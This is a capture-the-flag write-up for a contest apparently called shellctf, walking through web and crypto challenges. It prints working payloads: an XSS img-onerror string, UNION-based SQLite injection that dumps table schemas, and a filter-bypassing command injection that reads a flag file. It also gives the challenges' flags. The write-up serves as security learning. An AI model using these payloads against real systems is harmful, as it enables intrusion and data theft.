< WEB >
90% guessy, 10% challenge.
● [ Choosy ]
I found the word "script" is fitered. I could infer this problem is about XSS exploit.
payload
<img%20src=%27%27%20onerror=alert(1)>
Flag
shellctf{50oom3_P4yL0aDS_aM0ng_Maaa4nnY}
● [ Extractor ]
The service is consists of "Register Page" & "Login Page". I try sql injection attack in Login Page.
First, I didn't know what kind of sql this service use. So I tried to find sql version. Then, I successed with below payoad.
Payload : username' union select 1,sqlite_version(),3,4;--Got it. I could find this service uses sqlite database. Next, I should check out the name of this DB table uses. So checked table name with SQL Injection.
Payload : username' union select 1,tbl_name,3,4 from sqlite_master--
>> Result : AdminsThen, I should know column's count & column's name.
Payload : username' union select 1,sql,3,4 from sqlite_master--
>> Result : CREATE TABLE Admins ( id INTEGER PRIMARY KEY AUTOINCREMENT, user TEXT NOT NULL, pass TEXT NOT NULL, content TEXT NOT NULL )Then, I could find flag.
Flag
shellctf{Sql_1Nj3c7i0n_B45iC_XD}
● [ illusion ]
I entered some words in this service. I found "ls", "cd", "d .." is filtered. When these words exists, filtering that works like replace function of PHP is activated. For example, I entered "llss" this service deletes this words, so output is "ls".
I checked below payload was working.
Payload : ccdd.. ..;ls
>> Resut : __init__.py\n Dockerfile\n templates\n static\n app.pyI searched for few minutes and I could find flag.
payload
ccdd.. ..;ccdd .. ..;cat flag.txt
Flag
shellctf{F1l73R5_C4n'T_Pr3v3N7_C0mM4nd_1nJeC71on}
● [ Colour Cookie ]
When I entered "123", URL is like this.
I couldn't get any idea, So I checked files in this system.
I found extra ordinary file "base_cookie.css". I checked it up. At the bottom of this file, hint existed.
/* name="C0loR" */I input C0loR in there, but it didn't show me flag. So I use "C0loR" to parameter. Main page told "Blue is my favorite color". So I entered like this.
C0loR=blue
Flag
shellctf{C0ooooK13_W17h_c0ooorr3c7_Parr4m37er...}
● [ Doc holder ]
It's upload service. When I upload .pdf file, it shows "Yummy" and others show "Not tasty". This service is related to PDF file. And Hint 2 says "Think from right to left". So I upload any file with ".fdp" extension.
Flag
shellctf{R1ghtt_t0_l3ft_0verRiDe_1s_k3y}
< Crypto >
● [ Tweet ]
I searched bird on the wire, and I found this link.
Flag
SHELL{WELOVESINGING}
● [ Tring Tring ]
In description, I knew this description is morse code.
https://www.dcode.fr/morse-code
Result of decrypt is like "999 77 666 ... ". I thought this is keypad, so I decrypt.
Flag
SHELL{YOUCANREADMYSMS}
● [ OX9OR2 ]
Exploit Code
#! /usr/bin/python3
with open('crypt/OX9OR2/encrypted', 'rb') as fo:
cy = fo.read()
def xor(msg, key):
o = ''
for i in range(len(msg)):
o += chr(msg[i] ^ ord(key[i % len(key)]))
print(chr(msg[i] ^ ord(key[i % len(key)])))
return o
key = ''
pl1 = "SHELL{"
for i in range(6):
key += chr(ord(pl1[i])^cy[i])
print(key)
key='XORISCOOL'
for i in range(len(cy)):
print(chr( cy[i]^ord(key[i % 9]) ), end='')Flag
SHELL{X0R_1S_R3VeR51BL3}